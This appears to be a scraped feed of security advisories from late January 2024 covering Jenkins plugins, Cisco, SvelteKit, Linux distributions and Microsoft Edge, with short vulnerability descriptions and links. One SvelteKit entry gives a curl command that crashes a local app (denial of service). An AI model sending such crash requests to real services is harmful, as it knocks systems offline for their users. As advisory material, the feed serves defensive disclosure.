24.01.2024 23:52:44	maven	[MAVEN:GHSA-X22X-5PP9-8V7F] Content-Security-Policy disabled by Red Hat Dependency Analytics Jenkins Plugin (high)	Jenkins sets the Content-Security-Policy header to static files served by Jenkins (specifically DirectoryBrowserSupport), such as workspaces, /userContent, or archived artifacts, unless a Resource Root URL is specified.Red Hat Dependency Analytics Plugin 0.7.1 and earlier globally disables the Content-Security-Policy header for static files served by Jenkins whenever the 'Invoke Red Hat Dependency Analytics (RHDA)' build step is executed. This allows cross-site scripting (XSS) attacks by users with the ability to control files in workspaces, archived artifacts, etc.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X22X-5PP9-8V7F
24.01.2024 23:50:52	maven	[MAVEN:GHSA-F67F-2J6R-M4C9] Non-constant time webhook token comparison in Jenkins GitLab Branch Source Plugin (low)	Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F67F-2J6R-M4C9
24.01.2024 23:50:27	maven	[MAVEN:GHSA-8R93-59CF-358F] CSRF vulnerability in Jenkins GitLab Branch Source Plugin (moderate)	A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8R93-59CF-358F
24.01.2024 23:49:52	maven	[MAVEN:GHSA-FW9H-CXX9-GFQ3] Shared projects are unconditionally discovered by Jenkins GitLab Branch Source Plugin (moderate)	Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FW9H-CXX9-GFQ3
24.01.2024 23:48:53	maven	[MAVEN:GHSA-CJGM-9VC9-56MX] Path traversal vulnerability in Jenkins Matrix Project Plugin (moderate)	Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CJGM-9VC9-56MX
24.01.2024 23:45:59	maven	[MAVEN:GHSA-VPH5-2Q33-7R9H] Arbitrary file read vulnerability in Git server Plugin can lead to RCE (high)	Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VPH5-2Q33-7R9H
24.01.2024 18:00:00	cisco	[CISCO-SA-SB-BUS-ACL-BYPASS-5ZN9HNJK] Cisco Small Business Series Switches Stacked Reload ACL Bypass Vulnerability (medium)	A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device.This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state.Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-BUS-ACL-BYPASS-5ZN9HNJK
24.01.2024 18:00:00	cisco	[CISCO-SA-CUCM-RCE-BWNZQCUM] Cisco Unified Communications Products Remote Code Execution Vulnerability (critical)	A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-RCE-BWNZQCUM
24.01.2024 18:00:00	cisco	[CISCO-SA-CUC-XSS-9TFUU5MS] Cisco Unity Connection Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUC-XSS-9TFUU5MS
24.01.2024 21:13:38	npm	[NPM:GHSA-G5M6-HXPP-FC49] Sending a GET or HEAD request with a body crashes SvelteKit (high)	### SummaryIn SvelteKit 2 sending a GET request with a body eg `{}` to a SvelteKit app in preview or with `adapter-node` throws `Request with GET/HEAD method cannot have body.` and crashes the app.```node:internal/deps/undici/undici:6066 throw new TypeError("Request with GET/HEAD method cannot have body."); ^TypeError: Request with GET/HEAD method cannot have body. at new Request (node:internal/deps/undici/undici:6066:17) at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)Node.js v20.11.0````TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected.<!--### Details_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._-->### PoC<!-- _Complete instructions, including specific configuration details, to reproduce the vulnerability._ -->First do a fresh install of SvelteKit 2 with the example app. Typescript.1. `npm run build`2. `npm run preview`3. Go to http://localhost:4173 (works)4. curl -X GET -d "{}" http://localhost:4173/bye5. Application crashes and http://localhost:4173 is down### Impact<!-- _What kind of vulnerability is it? Who is impacted?_ -->Denial of Service for apps using `adapter-node`	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G5M6-HXPP-FC49
24.01.2024 13:12:41	ubuntu	[USN-6596-1] Apache::Session::LDAP vulnerability (high)	Apache::Session::LDAP could be made to expose sensitive information throughspoofing if it received invalid X.509 certificate.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6596-1
24.01.2024 16:22:04	maven	[MAVEN:GHSA-QH2W-9M7W-HJG2] Cross-site Scripting in JFinal (moderate)	Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QH2W-9M7W-HJG2
24.01.2024 19:00:49	rustsec	[RUSTSEC-2024-0008] Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') (medium)	### SummaryInsufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers.### DetailsOutbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests. Thus, if an attacker has sufficient control over header values (or names) in a request that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.)### Patches#### trillium-client >= 0.5.4:* If any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access.### Workaroundstrillium client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed.### ImpactThis only affects use cases where attackers have control of outbound headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values.### CreditDiscovered and reported by [@divergentdave](https://github.com/divergentdave)	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0008
24.01.2024 19:00:49	rustsec	[RUSTSEC-2024-0009] Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') (medium)	### SummaryInsufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over outbound headers.### DetailsOutbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending responses from the server. Thus, if an attacker has sufficient control over header values (or names) in an outbound response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.)### Patches#### trillium-http >= 0.3.12:* If a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission.* If a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent.### Workaroundstrillium services should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed.### ImpactThis only affects use cases where attackers have control of outbound headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values.### CreditDiscovered and reported by [@divergentdave](https://github.com/divergentdave)	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0009
26.01.2024 02:10:39	ubuntu	[USN-6609-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6609-1
26.01.2024 01:50:17	ubuntu	[USN-6608-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6608-1
26.01.2024 01:35:20	ubuntu	[USN-6607-1] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6607-1
26.01.2024 00:11:29	ubuntu	[USN-6606-1] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6606-1
26.01.2024 00:06:42	ubuntu	[USN-6605-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6605-1
25.01.2024 23:06:58	ubuntu	[USN-6604-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6604-1
25.01.2024 22:24:48	ubuntu	[USN-6603-1] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6603-1
25.01.2024 22:15:48	ubuntu	[USN-6602-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6602-1
25.01.2024 21:32:56	ubuntu	[USN-6601-1] Linux kernel vulnerability (high)	The system could be made to crash or run programs as an administrator.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6601-1
25.01.2024 20:32:58	ubuntu	[USN-6600-1] MariaDB vulnerabilities (medium)	Several security issues were fixed in MariaDB.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6600-1
25.01.2024 18:06:46	ubuntu	[USN-6599-1] Jinja2 vulnerabilities (medium)	Several security issues were fixed in jinja2.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6599-1
25.01.2024 14:44:31	ubuntu	[USN-6598-1] Paramiko vulnerability (medium)	A protocol flaw was fixed in Paramiko.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6598-1
25.01.2024 14:38:55	ubuntu	[USN-6597-1] Puma vulnerability (high)	Puma could be made to consume resources if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6597-1
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0804] Chromium: CVE-2024-0804 Insufficient policy enforcement in iOS Security UI		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0804
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0805] Chromium: CVE-2024-0805 Inappropriate implementation in Downloads		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0805
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0806] Chromium: CVE-2024-0806 Use after free in Passwords		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0806
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0807] Chromium: CVE-2024-0807 Use after free in WebAudio		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0807
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0808] Chromium: CVE-2024-0808 Integer underflow in WebUI		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0808
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0809] Chromium: CVE-2024-0809 Inappropriate implementation in Autofill		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0809
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0810] Chromium: CVE-2024-0810 Insufficient policy enforcement in DevTools		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0810
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0811] Chromium: CVE-2024-0811 Inappropriate implementation in Extensions API		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0811
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0812] Chromium: CVE-2024-0812 Inappropriate implementation in Accessibility		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0812
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0813] Chromium: CVE-2024-0813 Use after free in Reading Mode		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0813
25.01.2024 10:00:00	msrc	[MS:CVE-2024-0814] Chromium: CVE-2024-0814 Incorrect security UI in Payments		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0814
25.01.2024 10:00:00	msrc	[MS:CVE-2024-21326] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21326
25.01.2024 10:00:00	msrc	[MS:CVE-2024-21382] Microsoft Edge for Android Information Disclosure Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21382
25.01.2024 10:00:00	msrc	[MS:CVE-2024-21383] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21383
25.01.2024 10:00:00	msrc	[MS:CVE-2024-21385] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21385
25.01.2024 10:00:00	msrc	[MS:CVE-2024-21387] Microsoft Edge for Android Spoofing Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21387
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0387] php:8.1 security update (moderate)	php[8.1.27-1]- rebase to 8.1.27 RHEL-19093[8.1.14-1]- rebase to 8.1.14[8.1.8-1]- update to 8.1.8 #2070040[8.1.7-2]- clean unneeded dependency on useradd command[8.1.7-1]- update to 8.1.7 #2070040[8.1.6-2]- add upstream patch to initialize pcre before mbstring- add upstream patch to use more sha256 in openssl tests[8.1.6-1]- update to 8.1.6 #2070040php-pecl-apcu[5.1.21-1]- update to 5.1.21 for PHP 8.1 #2070040php-pecl-rrd[2.0.3-4]- build for PHP 8.1 #2070040php-pecl-xdebug3[3.1.4-1]- update to 3.1.4 for PHP 8.1 #2070040php-pecl-zip[1.20.1-1]- update to 1.20.1 for PHP 8.1 #2070040	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0387
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0463] rpm security update (moderate)	[4.16.1.3-27]- TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)- races with chown/chmod/capabilities calls during installation (CVE-2021-35938)- checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0463
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0464] python-urllib3 security update (moderate)	[1.26.5-3.0.1.1]- Security fix for CVE-2023-45803Resolves: RHEL-16874- Security fix for CVE-2023-43804Resolves: RHEL-12001	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0464
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0465] sqlite security update (moderate)	[3.34.1-7]- Fixes CVE-2023-7104	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0465
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0466] python3.9 security update (moderate)	[3.9.18-1.1]- Security fix for CVE-2023-27043Resolves: RHEL-20613	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0466
25.01.2024 02:00:00	oraclelinux	[ELSA-2024-0474] tomcat security update (moderate)	[1:9.0.62-37.el9_3.1]- Resolves: #2235370 CVE-2023-41080 tomcat: Open Redirect vulnerability in FORM authentication- Resolves: #2243749 CVE-2023-45648 tomcat: incorrectly parsed http trailer headers can cause request smuggling- Resolves: #2243751 CVE-2023-42794 tomcat: FileUpload: DoS due to accumulation of temporary files on Windows- Resolves: #2243752 CVE-2023-42795 tomcat: improper cleaning of recycled objects could lead to information leak	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0474
25.01.2024 02:00:00	redhat	[RHSA-2024:0463] rpm security update (moderate)	The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.Security Fix(es):* rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)* rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938)* rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0463
25.01.2024 02:00:00	redhat	[RHSA-2024:0464] python-urllib3 security update (moderate)	The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0464
25.01.2024 02:00:00	redhat	[RHSA-2024:0465] sqlite security update (moderate)	SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.Security Fix(es):* sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0465
25.01.2024 02:00:00	redhat	[RHSA-2024:0466] python3.9 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0466
25.01.2024 02:00:00	redhat	[RHSA-2024:0468] grub2 security update (moderate)	The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices.Security Fix(es):* grub2: bypass the GRUB password protection feature (CVE-2023-4001)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0468
25.01.2024 02:00:00	redhat	[RHSA-2024:0474] tomcat security update (moderate)	Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794)* tomcat: improper cleaning of recycled objects could lead to information leak (CVE-2023-42795)* tomcat: incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0474
25.01.2024 02:00:00	redhat	[RHSA-2024:0477] frr security update (moderate)	FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es):* ffr: Flowspec overflow in bgpd/bgp_flowspec.c (CVE-2023-38406)* ffr: Out of bounds read in bgpd/bgp_label.c (CVE-2023-38407)* frr: crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message (CVE-2023-47234)* frr: crash from malformed EOR-containing BGP UPDATE message (CVE-2023-47235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0477
26.01.2024 03:57:05	maven	[MAVEN:GHSA-53PH-2R2X-VQW8] Cross-site WebSocket hijacking vulnerability in the Jenkins CLI (high)	Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Since Jenkins 2.217 and LTS 2.222.1, one of the ways to communicate with the CLI is through a WebSocket endpoint. This endpoint relies on the default Jenkins web request authentication functionality, like HTTP Basic authentication with API tokens, or session cookies. This endpoint is enabled when running on a version of Jetty for which Jenkins supports WebSockets. This is the case when using the provided native installers, packages, or the Docker containers, as well as when running Jenkins with the command java -jar jenkins.war.Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-53PH-2R2X-VQW8
26.01.2024 03:56:44	maven	[MAVEN:GHSA-6F9G-CXWR-Q5JR] Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE (critical)	Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.* Attackers with Overall/Read permission can read entire files.* Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed, and has not identified any plugins that would increase this line count.Binary files containing cryptographic keys used for various Jenkins features can also be read, with some limitations (see note on binary files below). As of publication, the Jenkins security team has confirmed the following possible attacks in addition to reading contents of all files with a known file path. All of them leverage attackers' ability to obtain cryptographic keys from binary files, and are therefore only applicable to instances where that is feasible.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6F9G-CXWR-Q5JR
26.01.2024 11:15:07	alpinelinux	[ALPINE:CVE-2024-0727] openssl vulnerability	[From CVE-2024-0727] Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSLto crash leading to a potential Denial of Service attackImpact summary: Applications loading files in the PKCS12 format from untrustedsources might terminate abruptly.A file in PKCS12 format can contain certificates and keys and may come from anuntrusted source. The PKCS12 specification allows certain fields to be NULL, butOpenSSL does not correctly check for this case. This can lead to a NULL pointerdereference that results in OpenSSL crashing. If an application processes PKCS12files from an untrusted source using the OpenSSL APIs then that application willbe vulnerable to this issue.OpenSSL APIs that are vulnerable to this are: PKCS12_parse(),PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()and PKCS12_newpass().We have also fixed a similar issue in SMIME_write_PKCS7(). However since thisfunction is related to writing data we do not consider it security significant.The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0727
26.01.2024 10:00:00	msrc	[MS:CVE-2024-21336] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21336
26.01.2024 12:16:18	almalinux	[ALSA-2024:0468] grub2 security update (moderate)	grub2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0468
27.01.2024 02:00:00	debian	[DSA-5608-1] gst-plugins-bad1.0	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5608-1
26.01.2024 16:31:20	suse	[SUSE-SU-2024:0253-1] Security update for rear27a (important)	Security update for rear27a	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0253-1
26.01.2024 16:09:52	suse	[SUSE-SU-2024:0252-1] Security update for xorg-x11-server (moderate)	Security update for xorg-x11-server	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0252-1
26.01.2024 16:03:38	suse	[SUSE-SU-2024:0251-1] Security update for xorg-x11-server (moderate)	Security update for xorg-x11-server	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0251-1
26.01.2024 15:52:43	suse	[SUSE-SU-2024:0250-1] Security update for sevctl (important)	Security update for sevctl	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0250-1
26.01.2024 15:45:34	suse	[SUSE-SU-2024:0249-1] Security update for xorg-x11-server (moderate)	Security update for xorg-x11-server	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0249-1
26.01.2024 15:09:05	suse	[SUSE-SU-2024:0248-1] Security update for cpio (moderate)	Security update for cpio	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0248-1
26.01.2024 15:01:46	suse	[SUSE-SU-2024:0247-1] Security update for rear23a (important)	Security update for rear23a	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0247-1
26.01.2024 12:33:31	suse	[SUSE-SU-2024:0242-1] Security update for MozillaThunderbird (important)	Security update for MozillaThunderbird	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0242-1
28.01.2024 02:00:00	debian	[DSA-5609-1] slurm-wlm (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5609-1
30.01.2024 00:43:38	ubuntu	[USN-6605-2] Linux kernel (KVM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6605-2
30.01.2024 00:27:15	ubuntu	[USN-6604-2] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6604-2
30.01.2024 00:28:56	npm	[NPM:GHSA-WPXW-5XFM-X22V] MeshCentral algorithm-downgrade issue (moderate)	An algorithm-downgrade issue was discovered in Ylianst MeshCentral 1.1.16.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WPXW-5XFM-X22V
29.01.2024 20:08:52	ubuntu	[USN-6613-1] Ceph vulnerability	Ceph could be made to bypass authorization checks if it received aspecially crafted request.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6613-1
29.01.2024 19:02:56	ubuntu	[USN-6612-1] TinyXML vulnerability (high)	TinyXML could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6612-1
